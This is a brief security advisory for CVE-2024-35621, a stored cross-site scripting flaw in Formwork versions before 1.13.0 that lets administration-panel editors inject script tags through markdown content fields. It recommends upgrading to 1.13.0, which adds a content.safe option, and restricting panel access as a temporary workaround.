CVE-2024-35621

Name of the Vulnerable Software and Affected Versions Formwork versions prior to 1.13.0

Description A cross-site scripting (XSS) issue allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Content field. Users with access to the administration panel with page editing permissions could insert <script> tags in markdown fields, which are exposed on the publicly accessible site pages, leading to potential XSS injections.

Recommendations For versions prior to 1.13.0, update to Formwork 1.13.0 or later, which includes a patch that solves this vulnerability by introducing the content.safe mode system config option to control whether HTML tags and potentially dangerous links are escaped. As a temporary workaround, consider restricting access to the administration panel to a controlled group of editors to minimize the risk of exploitation.